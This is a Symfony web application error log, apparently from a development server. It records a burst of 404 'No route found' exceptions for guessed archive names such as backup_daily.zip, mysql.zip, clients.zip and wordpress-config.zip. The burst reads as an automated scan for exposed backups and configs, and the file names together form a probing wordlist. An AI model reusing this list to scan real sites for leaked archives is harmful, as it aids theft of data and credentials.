[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_yearly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_yearly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /data.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /data.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cfg.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cfg.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_2.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_2.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /prototype.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /prototype.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clients.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clients.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mysql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mysql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cloud.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cloud.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_daily.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_daily.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /neo4j.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /neo4j.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongo.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongo.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bower_components.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bower_components.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /environment.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /environment.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /web.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /web.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_5.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_5.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /devtools.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /devtools.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /secure.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /secure.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /release-candidate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /release-candidate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /composer.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /composer.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /plesk.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /plesk.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /yml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /yml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /audio.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /audio.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrators.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrators.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /temporary.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /temporary.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /applications.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /applications.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /lib.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /lib.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /hostgator.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /hostgator.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
